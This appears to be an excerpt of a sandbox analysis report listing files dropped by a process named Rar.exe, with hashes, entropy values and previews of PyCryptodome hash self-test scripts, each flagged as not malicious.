                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/SHA1.py: Self-test for the SHA-1 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2596
                                                                                                                                                                                                                                  Entropy (8bit):5.555931747660862
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NHAwEIB0jcQHMsvI/S3oCFlUyLT0goLdBqSTDfm5XToJcwkN9aZa:BAwfFQHvon4KBjvfmpcJ9e9B
                                                                                                                                                                                                                                  MD5:B8272B893F84638AC7604C66D3A39377
                                                                                                                                                                                                                                  SHA1:3E9F2AE5034A1273F2858E056A2243E66083C300
                                                                                                                                                                                                                                  SHA-256:DDEE3A1A84DB48FF22767CF608328DA5A29FECAF3200DA8ED96DD3742108EC88
                                                                                                                                                                                                                                  SHA-512:B18E78D78AA312856243761AFFB20563DDADEB76E54A36020F613BE46D3F54AD36719A976FABA5E770D5EFE20051B788EB2CEE31CC96775A8C53F1A00EECD383
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA224.py: Self-test for the SHA-224 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3711
                                                                                                                                                                                                                                  Entropy (8bit):5.410059181897839
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:CwfFQHvozH8LqjLdPa6nHQhq/vElfHY6rB:CwdQHv/ej1aq3EW6rB
                                                                                                                                                                                                                                  MD5:4EC91C526F642FAC5FBBA2403B6979E8
                                                                                                                                                                                                                                  SHA1:C2687CC0D6D8039B6C9CCFD0CB168E1422CC0854
                                                                                                                                                                                                                                  SHA-256:3F4BEBB1DB2B687741C27AC9D56E16972660AF0A74B21417C4CB50A1A001EDFB
                                                                                                                                                                                                                                  SHA-512:F251427EDF4AE58BF83269948AC409F277762947A362C7FB34D415C9EDD0468E57BCA0C807F1E8979524A4B076BE2AA00EB80E654A3606206EBBF369612B81F0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA256.py: Self-test for the SHA-256 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2775
                                                                                                                                                                                                                                  Entropy (8bit):5.608484169393894
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NzwEIB0jcQHMsvI/S3oCFlPyLT0L3QlmQe5FKk8MHn/TxJcwkgspaZa:NwfFQHvoA4iwTe5FF8kn/lJ9LKB
                                                                                                                                                                                                                                  MD5:C28E0828194EB028F7B306FB712A9EAA
                                                                                                                                                                                                                                  SHA1:EA67E9AF1A6F3F740A3FF214B329434102F8DFB5
                                                                                                                                                                                                                                  SHA-256:6C12D0636052AC571F310AECFE96011410C6CDFAB71EB8FCA5264997F3D03F49
                                                                                                                                                                                                                                  SHA-512:EE94D62A499A49689943A39EE62C71E6E4FEE350CC3DCA542BF98BF1379EB40B59B97654EC4475A88B40A495A9CCA13DD7B6F2FB1B64AFCD8E0CACF3498493D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA.py: Self-test for the SHA-384 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2909
                                                                                                                                                                                                                                  Entropy (8bit):5.083516920318784
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:sZIB0jcQHMsvI/S3oCFldtjT+Y+J+K+QyPqOKCV4y9KVbghRMb0krGraZy:saFQHvooBjs1HyCU0bgUb0QGrh
                                                                                                                                                                                                                                  MD5:3A2B4546DFD29BD8244B93436FB7C3D2
                                                                                                                                                                                                                                  SHA1:5050E387FD02C3B1184B8A6C0681624BB54D535C
                                                                                                                                                                                                                                  SHA-256:C50486C345952D8FD5BE518F43C618DB8D586F374CFDC382C005A38006B4EF29
                                                                                                                                                                                                                                  SHA-512:012F1E12125D92B22661BDD1715A05DF84822207534CCE8DAD1F1D2EBD8D89566D05A1E3B87E08A7F510E4B9C6C9C070AD8B8EEA7C4AFC362405A0769ECD8793
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA3_224.py: Self-test for the SHA-3/224 hash function..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2911
                                                                                                                                                                                                                                  Entropy (8bit):5.091560650200558
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:spIB0jcQHMsvI/S3oCFlstjT+Y+J+f+QyPqOKCV4y9KVbgCiMbxkY9raZy:sqFQHvotBjscHyCU0bgChbxtrh
                                                                                                                                                                                                                                  MD5:EA8C7A86602639218A01895640882344
                                                                                                                                                                                                                                  SHA1:4AFDA1348AE7171EE91211FD68FFFC40B1DDD52B
                                                                                                                                                                                                                                  SHA-256:872C11A1795C3CF07AAACA69A85F622D045E317D7401EFD9194A762DCE149E31
                                                                                                                                                                                                                                  SHA-512:AD0C35C1A9305A768C76CEF52D97E845E56B12A89F66A3AEC43F192475A1EC7DFA08CCE2713825BA920FF046DE65D0C83BAB65464262C0672D1AC0ECA5A539FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA3_256.py: Self-test for the SHA-3/256 hash function..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2909
                                                                                                                                                                                                                                  Entropy (8bit):5.083684469312827
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:sJIB0jcQHMsvI/S3oCFlstjT+Y+J+b+QyPqOKCV4y9KVbg60Mb0kvraZy:sKFQHvotBjsMHyCU0bg67b0Grh
                                                                                                                                                                                                                                  MD5:6996CA60721AF6613146FDD87B1AAFE2
                                                                                                                                                                                                                                  SHA1:2F21AAF3C476733885C5CFC827CE9AD5D28EAE41
                                                                                                                                                                                                                                  SHA-256:FCA402667AE407801EC05E7EE90BFCB43253CE564A9F2748C6C2BB839DC4388F
                                                                                                                                                                                                                                  SHA-512:D91F577B2AA0CC9755400228A113EB76B403D546924230FB4BE35F4F42441DA71C67EDFC66D1FA7A47F5A6032538E7664AC7446516B90D89266608C15B559488
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA3_384.py: Self-test for the SHA-3/384 hash function..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2910
                                                                                                                                                                                                                                  Entropy (8bit):5.089282138992312
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:sdIB0jcQHMsvI/S3oCFlhtjT+Y+J+++QyPqOKCV4y9KVbgfMb0k6raZy:suFQHvooBjsxHyCU0bg0b05rh
                                                                                                                                                                                                                                  MD5:777E76440360EA5E1A4F7946D1DC8A73
                                                                                                                                                                                                                                  SHA1:7A59611CC81F5FE530241C2A58A29EFCDA38B319
                                                                                                                                                                                                                                  SHA-256:C0D24363A1EE4144A234FB31AB7FEBDF1D99BD16E5859DD90D79D8E1ACF045DD
                                                                                                                                                                                                                                  SHA-512:50DD4782B63C869D4812EC247DE1F791B0F81AA041D2059EA695B2E0C27597A3803D25017317F79E84DD6F249E81B082D9BA81049D2DA1DE04440E26B5C1CA66
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA3_512.py: Self-test for the SHA-3/512 hash function..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5338
                                                                                                                                                                                                                                  Entropy (8bit):5.14528410560435
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:CwfFQHvowBI4SH4XGXPfre5E8xeI0qs8ZSwm3ha8ZSB3CS8ZS934rB:CwdQHvAQG/frkxefqVExLUSjgIrB
                                                                                                                                                                                                                                  MD5:1C79BE11857F948FBB655DC8AA8153D1
                                                                                                                                                                                                                                  SHA1:15426D7DB44AE38FF61DB9F1F4FB5E3C2B6E126C
                                                                                                                                                                                                                                  SHA-256:66CC1C34EBBB0775A0EE58206FD09D9CAFE4AC46114112340C0A8DEF95E24E06
                                                                                                                                                                                                                                  SHA-512:6FF0560839317907DFCD875F77F695C9F6CBD92BC57348FAF1CB46C4CC8A5672096F3F8036E9EA0F533AF1E7B83C05BF1577E0228320E0667B7F85E97C012C77
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA512.py: Self-test for the SHA-512 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4858
                                                                                                                                                                                                                                  Entropy (8bit):5.162690426324188
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:M7DqrYJALrYJHdt3EHGuIM1jPGHaudxxqt5xxqpVGOh:4qrskrs9t3q/I6udbq5bWIOh
                                                                                                                                                                                                                                  MD5:844F1200ABC50C8AF04699ED8693094A
                                                                                                                                                                                                                                  SHA1:60DD5DCFCBC4028DF905E2C18B57DE9AA1A265ED
                                                                                                                                                                                                                                  SHA-256:B4FAFF54CEC2BD0071EE9DD38A38F446ACDEB81A7216C18F242D0BD8393E21CE
                                                                                                                                                                                                                                  SHA-512:8157EF05954697F9F1D75269FCFD8445CB82C302ABECAE386194F6071ED780D6F954BF255AB73CE50ECFCF47BDFB112AEBA48947086C86B2619951CC4F3B193D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9000
                                                                                                                                                                                                                                  Entropy (8bit):4.582880901232354
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:vPuxbp/u47AstnU5XIZnCxTVxQo/cnCOa:0dKsdUy1mTVV/cnG
                                                                                                                                                                                                                                  MD5:0CD739D505C4A5D84BB76784073B1557
                                                                                                                                                                                                                                  SHA1:CE238370C8D61C1951AF229D6912DC398E4B2261
                                                                                                                                                                                                                                  SHA-256:996817F0C1FF6BE9642C71B0C64FE8B2B783DF516DFC289C950E7212DB2651E5
                                                                                                                                                                                                                                  SHA-512:B6273F9B9F342DF9D23BCE216963AE2979A0BC6740BB1458CA39D95A8AE330C1E400DC2CB0CBB864B6D2DA3921FC9F4FAA2090B48F4BBBAAF6CD5BB397230F37
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..from binascii import unhexlify, hexlify....from Crypto.Util.py3compat import tobytes..from Crypto.SelfTest.st_common import list_test_cases....from Crypto.Hash import TupleHash128, TupleHash256......class TupleHashTest(unittest.TestCase):.... def new(self, *args, **kwargs):.. return self.TupleHash.new(*args, **kwargs).... def test_new_positive(self):.... h = self.new().. for new_func in self.TupleHash.new, h.new:.... for dbits in range(64, 1024 + 1, 8):.. hobj = new_func(digest_bits=dbits).. self.assertEqual(hobj.digest_size * 8, dbits).... for dbytes in range(8, 128 + 1):.. hobj = new_func(digest_bytes=dbytes).. self.assertEqual(hobj.digest_size, dbytes).... hobj = h.new().. self.assertEqual(hobj.digest_size, self.default_bytes).... def test_new_negative(self):.... h = self.new().. for new_func in self.TupleHash.new, h.new:..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15477
                                                                                                                                                                                                                                  Entropy (8bit):4.797172752964677
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ZhR+CSwVR7RRUMglQOMhFs42YomDg1l0xokdgrQff26duEhOROa1s/0fOa:ZhRaDXkeQvO6uEos4
                                                                                                                                                                                                                                  MD5:7416C9644E4F1208364986E5473EA89E
                                                                                                                                                                                                                                  SHA1:FE5A66E3FC35342C9BB9904FE6DCD87AC7AEC33F
                                                                                                                                                                                                                                  SHA-256:1AD796B5A7AC7C12AAAECCD151CDF0AB312B28621FD09A047F974F9367A30B7E
                                                                                                                                                                                                                                  SHA-512:4C67EF2BF5D2E0E22F4098A632AE2C25D7FC778D92535CA9B16C0E3F80173E151CAEDBEBDFFB97A5D540FDA1D2114497346C3EEB9954BD3886D08D22E58D2A36
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Self-test suite for Crypto.Hash.TurboSHAKE128 and TurboSHAKE256"""....import unittest..from binascii import unhexlify....from Crypto.SelfTest.st_common import list_test_cases....from Crypto.Hash import TurboSHAKE128, TurboSHAKE256..from Crypto.Util.py3compat import bchr......class TurboSHAKETest(unittest.TestCase):.... def test_new_positive(self):.... xof1 = self.TurboSHAKE.new().. xof1.update(b'90').... xof2 = self.TurboSHAKE.new(domain=0x1F).. xof2.update(b'90').... xof3 = self.TurboSHAKE.new(data=b'90').... out1 = xof1.read(128).. out2 = xof2.read(128).. out3 = xof3.read(128).... self.assertEqual(out1, out2).. self.assertEqual(out1, out3).... def test_new_domain(self):.. xof1 = self.TurboSHAKE.new(domain=0x1D).. xof2 = self.TurboSHAKE.new(domain=0x20).. self.assertNotEqual(xof1.read(128), xof2.read(128)).... def test_update(self):.. pieces = [bchr(10) * 200, bchr(20) * 300].
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6970
                                                                                                                                                                                                                                  Entropy (8bit):5.194425901690965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:M/DqrYJALrYJHdt3EHGuI3jPiHhu0nHU+aS+rFX3F/0a+WuW96lOh:Gqrskrs9t3q/Ieu0nHULbdV0a+9mcOh
                                                                                                                                                                                                                                  MD5:66C07A7C4501D81AE688CB8D86E1124C
                                                                                                                                                                                                                                  SHA1:954B46653D497E318F2D997FB6C10048E64A79B6
                                                                                                                                                                                                                                  SHA-256:ADED756FB81F8601C093433F2A8549D91033C2FDC632F5D0A96E82D65BBCABB3
                                                                                                                                                                                                                                  SHA-512:9D20AFBDA3E9BE26EB19D23CFD5758D6CFF425C0EBD0F662E0AF3E47A39955943A30161F4A7DC44C6A26B73C04DFA965F00C677E30D80B753052DD9DC01E0740
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,..# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9139
                                                                                                                                                                                                                                  Entropy (8bit):4.901557899833285
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4qrskrs9t3q/I6ffRHk7Lo626/b5pfpkM67Oh:Hrskrs9VqNX9k70626T5lpB6g
                                                                                                                                                                                                                                  MD5:E6120ECD0AC2994275652761FFC133EF
                                                                                                                                                                                                                                  SHA1:56AED1B699770BF14C7765D38BE1E11AA6AE4910
                                                                                                                                                                                                                                  SHA-256:F75F0DDB0190F6B0177DFCD321931AC8BCF9B0A6BF0539B413D719A3E104656E
                                                                                                                                                                                                                                  SHA-512:544E46E5E4546A31925EE99C8D1DE196F94C90C2FA93105059D2BD95C21D1B67E1E25574B093EA148F713213042528BF32B1660F3942E019FE0D52D5CBDEFAAE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2041
                                                                                                                                                                                                                                  Entropy (8bit):5.273948297631314
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:RMWOqrYJALrYJHdG43tDs3EsIG13NcuIH60w0raZ+:uDqrYJALrYJHdt3EHGuIaSrN
                                                                                                                                                                                                                                  MD5:82492759411EAD272738749D44872798
                                                                                                                                                                                                                                  SHA1:27789E533A2E5B1EDE1C5C958711BF87FDA622F0
                                                                                                                                                                                                                                  SHA-256:E0FEABC0079FD763084043FC5C8BE120E43D75E0D12770E73CAE0781423B2F20
                                                                                                                                                                                                                                  SHA-512:D6E11BD164B8AECB79457398EEFF26491043F127B3E450E01A0C2B384A8A375944B0846CE806BAB4833FECBB2A766775E19E944C81FB80EAE3337AC28F2C1F6F
                                                                                                                                                                                                                                  Malicious:false
